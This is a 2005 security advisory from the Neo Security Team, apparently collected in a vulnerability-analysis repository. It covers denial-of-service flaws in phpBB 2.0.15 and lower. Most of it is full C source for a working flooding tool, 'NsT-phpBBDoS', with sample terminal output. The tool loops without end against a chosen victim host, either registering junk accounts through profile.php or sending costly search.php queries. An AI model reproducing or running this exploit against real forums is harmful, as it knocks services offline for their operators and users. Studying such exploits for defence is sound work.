lilbool/vuln-code-analysis
0
1/*
2--------------------------------------------------------
3[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06
4--------------------------------------------------------
5Program: phpBB 2.0.15
6Homepage: http://www.phpbb.com
7Vulnerable Versions: phpBB 2.0.15 & Lower versions
8Risk: High Risk!!
9Impact: Multiple DoS Vulnerabilities.
10
11 -==phpBB 2.0.15 Multiple DoS Vulnerabilities ==-
12---------------------------------------------------------
13
14- Description
15---------------------------------------------------------
16phpBB is a high powered, fully scalable, and highly customizable
17Open Source bulletin board package. phpBB has a user-friendly
18interface, simple and straightforward administration panel, and
19helpful FAQ. Based on the powerful PHP server language and your
20choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
21phpBB is the ideal free community solution for all web sites.
22
23- Tested
24---------------------------------------------------------
25localhost & many forums
26
27- Explotation
28---------------------------------------------------------
29profile.php << By registering as many users as you can.
30search.php << by searching in a way that the db couln't observe it.
31
32- Exploit
33---------------------------------------------------------
34[C Source]
35/*
36 Name: NsT-phpBBDoS
37 Copyright: NeoSecurityteam
38 Author: HaCkZaTaN
39 Date: 19/06/05
40 Description: xD You must figure out the problem xD
41
42 root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c
43 root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS
44 root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS
45 [+] NsT-phpBBDoS v0.1 by HaCkZaTaN
46 [+] NeoSecurityTeam
47 [+] Dos has begun....[+]
48
49 [*] Use: ./NsT-phpBBDoS <path> <search.php or profile.php> <Host>
50 [*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
51 root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
52 [+] NsT-phpBBDoS v0.1 by HaCkZaTaN
53 [+] NeoSecurityTeam
54 [+] Dos has begun....[+]
55
56 .................................
57 root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created"
58 root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE
59 MACHTYPE=i486-slackware-linux-gnu
60 root@NeoSecurity:/home/hackzatan#
61
62*/
63
64#include <stdio.h>
65#include <stdlib.h>
66#include <string.h>
67#include <errno.h>
68#ifdef WIN32
69#include <winsock2.h>
70#pragma comment(lib, "ws2_32")
71#pragma pack(1)
72#define WIN32_LEAN_AND_MEAN
73#else
74#include <unistd.h>
75#include <sys/types.h>
76#include <sys/socket.h>
77#include <netinet/in.h>
78#include <arpa/inet.h>
79#include <netdb.h>
80#endif
81
82#define __USE_GNU
83#define _XOPEN_SOURCE
84
85int Connection(char *, int);
86void Write_In(int , char *, char *a, char *, int);
87char Use(char *);
88
89int main(int argc, char *argv[])
90{
91 int sock, x = 0;
92 char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];
93
94 puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN");
95 puts("[+] NeoSecurityTeam");
96 puts("[+] Dos has begun....[+]\n");
97 fflush(stdout);
98
99 if(argc != 4) Use(argv[0]);
100
101 while(1)
102 {
103 sock = Connection(Host,80);
104 Write_In(sock, Path, Pro_Sea, Host, x);
105 #ifndef WIN32
106 shutdown(sock, SHUT_WR);
107 close(sock);
108 #else
109 closesocket(sock);
110 WSACleanup();
111 #endif
112 Pro_Sea = argv[2];
113 x++;
114 }
115 //I don't think that it will get here =)
116
117 return 0;
118}
119
120int Connection(char *Host, int Port)
121{
122 #ifndef WIN32
123 #define SOCKET int
124 #else
125 int error;
126 WSADATA wsadata;
127 error = WSAStartup(MAKEWORD(2, 2), &wsadata);
128
129 if (error == SOCKET_ERROR)
130 {
131 perror("Could Not Start Up Winsock!\n");
132 return;
133 }
134
135 #endif
136
137 SOCKET sockfd;
138 struct sockaddr_in sin;
139 struct in_addr *myaddr;
140 struct hostent *h;
141
142 if(Port <= 0 || Port > 65535)
143 {
144 puts("[-] Invalid Port Number\n");
145 fflush(stdout);
146 exit(-1);
147 }
148
149 if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
150 {
151 perror("socket() ");
152 fflush (stdout);
153 exit(-1);
154 }
155
156 if(isalpha(Host[0]))
157 {
158 if((h = gethostbyname(Host)) == NULL)
159 {
160 perror("gethostbyname() ");
161 fflush (stdout);
162 exit(-1);
163 }
164 }
165 else
166 {
167 myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
168 myaddr->s_addr=inet_addr(Host);
169
170 if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL)
171 {
172 perror("gethostbyaddr() ");
173 fflush (stdout);
174 exit(-1);
175 }
176 }
177
178 memset(&sin, 0, sizeof(sin));
179 sin.sin_family = AF_INET;
180 sin.sin_port = htons(Port);
181 memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
182
183 if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)
184 {
185 perror("connect() ");
186 exit (-1);
187 }
188
189 return sockfd;
190}
191
192void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)
193{
194 char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ);
195 char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n"
196 "Accept: */*\r\n"
197 "Accept-Language: en-us\r\n"
198 "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
199 "Accept encoding: gzip,deflate\r\n"
200 "Keep-Alive: 300\r\n"
201 "Proxy-Connection: keep-alive\r\n"
202 "Content-Type: application/x-www-form-urlencoded\r\n"
203 "Cache-Control: no-cache\r\n"
204 "Pragma: no-cache\r\n";
205 char *Profile = "%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\r\n";
206 char *Search = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\r\n";
207
208 if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile);
209 else if(strcmp("search.php", Pro_Sea) == 0)
210 {
211 Pro_Sea = "search.php?mode=results";
212 sprintf(str1, "search_keywords=Hack%d%s", x, Search);
213 }
214 else
215 {
216 puts("Sorry. Try making the right choice");
217 exit(-1);
218 }
219
220 sprintf(str2, "POST %s%s HTTP/1.1\r\n"
221 "Host: %s\r\n"
222 "Referer: http://%s/\r\n%s"
223 "Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);
224
225 write(sock, str2, strlen(str2));
226 write(1, ".", 1);
227 fflush(stdout);
228}
229
230char Use(char *program)
231{
232 fprintf(stderr,"[*] Use: %s <path> <search.php or profile.php> <Host>\n", program);
233 fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program);
234 fflush(stdout);
235 exit(-1);
236}
237
238/*
239
240@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
241'@@@@@''@@'@@@''''''''@@''@@@''@@
242'@@'@@@@@@''@@@@@@@@@'''''@@@
243'@@'''@@@@'''''''''@@@''''@@@
244@@@@''''@@'@@@@@@@@@@''''@@@@@
245
246*/
247
248// milw0rm.com [2005-06-22]